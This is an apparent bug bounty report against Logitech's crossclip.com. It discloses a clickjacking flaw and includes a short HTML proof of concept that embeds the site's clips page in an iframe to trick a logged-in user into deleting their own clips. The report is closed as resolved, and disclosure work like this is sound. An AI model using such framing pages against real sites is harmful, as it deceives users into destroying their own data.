clickjacking on deleting user's clips [https://crossclip.com/clips]
Low
L
Logitech
Submitted None
Actions:
Reported by
ibrahimatix0x01
Vulnerability Details
Technical details and impact analysis
## Summary:
An attacker can trick victim to delete his own clips on https://crossclip.com/clips.
## Steps To Reproduce:
{F1403810}
1. Login
1. Create an HTML file with the following code.
```
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I-Frame</title>
</head>
<body>
<center><h1>THIS PAGE IS VULNERABLE TO CLICKJACKING</h1>
<iframe src="https://crossclip.com/clips" frameborder="0 px" height="1200px" width="1920px"></iframe>
</center>
</body>
</html>
```
## Supporting Material/References:
{F1403810}
## Impact
tricking user to delete his own clips
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
UI Redressing (Clickjacking)